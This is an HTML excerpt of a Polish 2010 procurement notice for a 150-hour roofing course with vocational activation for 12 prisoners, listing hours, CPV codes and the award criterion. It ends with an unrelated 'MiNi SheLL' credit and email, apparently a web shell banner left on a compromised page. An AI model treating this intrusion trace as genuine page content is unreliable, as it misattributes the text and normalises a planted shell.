<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> kurs Dekarz dla 12 osadzonych razem z aktywizacją zawodową.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs powinien obejmować łącznie 150 godzin:
- 30 godzin zajęć teoretycznych - 1 godzina dydaktyczna = 45 minut,
- 120 godzin zajęć praktycznych- 1 godzina dydaktyczna = 60 minut.
Aktywizacja zawodowa obejmuje 26 godzin zajęć  aktywizacyjnych: 
a.zajęcia grupowe - 8 godz.- grupa oraz 
b.indywidualne -1,5 godz.-osoba; 1 godzina dydaktyczna = 45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 10.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com